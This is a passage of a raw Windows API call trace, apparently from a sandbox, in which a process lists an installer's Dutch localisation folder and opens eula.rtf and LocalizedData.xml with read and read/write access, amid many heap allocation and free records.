dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1044", cAlternateFileName="")) returned 1 [0061.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0061.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0061.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.193] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0061.194] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.194] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71bd0 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0061.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0061.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.194] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.194] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.194] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0061.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.195] AreFileApisANSI () returned 1 [0061.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1043\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.195] AreFileApisANSI () returned 1 [0061.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0061.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 36 [0061.195] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.196] GetFileType (hFile=0x41c) returned 0x1 [0061.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.196] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.196] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.196] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.196] CloseHandle (hObject=0x41c) returned 1 [0061.197] AreFileApisANSI () returned 1 [0061.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0061.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 36 [0061.197] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.197] GetFileType (hFile=0x41c) returned 0x1 [0061.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0061.197] CloseHandle (hObject=0x41c) returned 1 [0061.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.198] AreFileApisANSI () returned 1 [0061.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 36 [0061.198] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda)) returned 1 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.198] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0061.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.199] AreFileApisANSI () returned 1 [0061.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0061.199] AreFileApisANSI () returned 1 [0061.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 45 [0061.200] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.200] GetFileType (hFile=0x41c) returned 0x1 [0061.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.200] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.200] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.200] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.200] CloseHandle (hObject=0x41c) returned 1 [0061.200] AreFileApisANSI () returned 1 [0061.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71bd0 [0061.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 45 [0061.201] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.201] GetFileType (hFile=0x41c) returned 0x1 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.201] CloseHandle (hObject=0x41c) returned 1 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.202] AreFileApisANSI () returned 1 [0061.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0061.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 45 [0061.202] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712)) returned 1 [0061.202] HeapFree (in: hHeap=0x20000, 